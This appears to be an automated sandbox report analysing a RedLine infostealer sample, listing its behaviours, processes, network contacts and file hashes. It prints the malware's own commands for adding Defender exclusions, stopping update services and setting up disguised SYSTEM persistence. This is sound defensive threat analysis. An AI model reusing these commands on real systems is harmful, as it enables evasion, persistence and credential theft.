Malware Analysis Report

2025-01-18 08:04

Sample ID 230810-w12ccagd43
Target 113c295681410c02517b52bd6aba932e.exe
SHA256 fd64ca492cd7181e02bebe0d9b3b1c5616af08c7c1e1a7cc4e22ab41246c3995
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Threat Level: Known bad

The file 113c295681410c02517b52bd6aba932e.exe was found to be: Known bad.

Malicious Activity Summary

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Stops running service(s)

Drops file in Drivers directory

Executes dropped EXE

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Program Files directory

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies system certificate store

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-10 18:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-10 18:24

Reported

2023-08-10 18:26

Platform

win7-20230712-en

Max time kernel

108s

Max time network

150s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2180 set thread context of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0329419b8cbd901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [certificate blob not included in report] C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = [certificate blob not included in report] C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2636 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2888 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2636 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2180 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2180 wrote to memory of 936 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2872 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2872 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2760 wrote to memory of 1192 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 2872 wrote to memory of 828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2984 wrote to memory of 2608 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 2636 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2600 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 484 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1724 wrote to memory of 2420 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe

"C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {349F8664-B064-434E-87A7-BA89F112274C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=37935 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6939758,0x7fef6939768,0x7fef6939778

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=796 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1228 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=37935 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1352 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#syxapd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37935 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1984 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37935 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2500 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=37935 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2620 --field-trial-handle=980,i,6353678300731138934,15137958939261455866,131072 --disable-features=PaintHolding /prefetch:1

Network

Country Destination Domain Proto
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
NL 88.221.25.169:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp

Files

C:\Users\Admin\AppData\Local\Temp\CabC2E4.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

C:\Users\Admin\AppData\Local\Temp\TarC518.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1dffc4ec990d1d262881a4600fb35797
SHA1 4b1a7ae3d950e31e0f3d8cb90bbcba39b331ba27
SHA256 3805a8d0eadc1983604c3dd09f8f5f6f27bb5f26c778f8f70a490925116a3ed5
SHA512 b5fe94c4cc40ccc150dc49a05ac143120d68ef6213be34ca831aa85cd5b21f702866f4f07abf9a58236a7db3bfec09bc69406686de1a915929f8cc906fd9c0b0

\Users\Admin\AppData\Local\Temp\mi.exe

MD5 80b0b41decb53a01e8c87def18400267
SHA1 885f327c4e91065486137ca96105190f7a29d0f9
SHA256 10d8e7a04d05a2690a7e0cc30c10028eda0af680a8787f24cb9668ccbe46e1e1
SHA512 19bd6c9ab0cfbba34e722f508fcb4a99ae78a0d71ef664b186034c78eda09a61ae63455f7958dd5a50ec6432c822b23582ca7c87309a37fcbbb28e5facf56c8e

\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2180-185-0x0000000000820000-0x0000000000AAB000-memory.dmp

memory/2636-184-0x000000000A220000-0x000000000A4AB000-memory.dmp

memory/2180-186-0x0000000000820000-0x0000000000AAB000-memory.dmp

memory/1916-187-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1916-188-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1916-194-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1916-196-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1916-199-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1596-209-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/1916-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1596-206-0x000000001B170000-0x000000001B452000-memory.dmp

memory/1916-205-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/2904-211-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/1916-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-227-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-228-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-229-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-230-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-234-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-233-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-231-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1916-235-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-236-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-237-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-238-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-239-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-240-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-242-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-241-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1596-244-0x000000000240B000-0x0000000002472000-memory.dmp

memory/1916-243-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-245-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1916-246-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1596-264-0x0000000002404000-0x0000000002407000-memory.dmp

memory/1596-263-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/1916-284-0x0000000077E8F000-0x0000000077E90000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 be888b9c10c69b9b8cea30806dc11dda
SHA1 35d16d70fde8315b40cc06d563bd6496024852cc
SHA256 a3e79440e164e60eda9109f7750d117e38a93b048800f27647d45142e5aa2abc
SHA512 4661610f9792ce3949cfe52d270f8565dfb6f70f1f2604c8efd9f6aa536688527486c337331bfebb6d3dac0b25e369ab1a8c87e9d8d28b61ef0b014f6d580e33

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FZ8FUABT5TFTRYLILC2F.temp

MD5 be888b9c10c69b9b8cea30806dc11dda
SHA1 35d16d70fde8315b40cc06d563bd6496024852cc
SHA256 a3e79440e164e60eda9109f7750d117e38a93b048800f27647d45142e5aa2abc
SHA512 4661610f9792ce3949cfe52d270f8565dfb6f70f1f2604c8efd9f6aa536688527486c337331bfebb6d3dac0b25e369ab1a8c87e9d8d28b61ef0b014f6d580e33

memory/2760-297-0x0000000002000000-0x0000000002008000-memory.dmp

memory/2760-296-0x000000001B060000-0x000000001B342000-memory.dmp

memory/2760-299-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/2760-298-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

memory/2760-302-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/2760-301-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/2760-300-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

memory/2760-303-0x000007FEF5580000-0x000007FEF5F1D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2904-307-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/2904-308-0x000000013F1C0000-0x00000001403E6000-memory.dmp

memory/2636-309-0x000000000A220000-0x000000000A4AB000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2180-313-0x0000000000820000-0x0000000000AAB000-memory.dmp

memory/2984-315-0x000000013F300000-0x0000000140526000-memory.dmp

memory/2608-321-0x000000013F300000-0x0000000140526000-memory.dmp

memory/2608-323-0x0000000077C90000-0x0000000077E39000-memory.dmp

memory/1596-324-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/2608-328-0x000000013F300000-0x0000000140526000-memory.dmp

memory/2984-327-0x000000013F300000-0x0000000140526000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
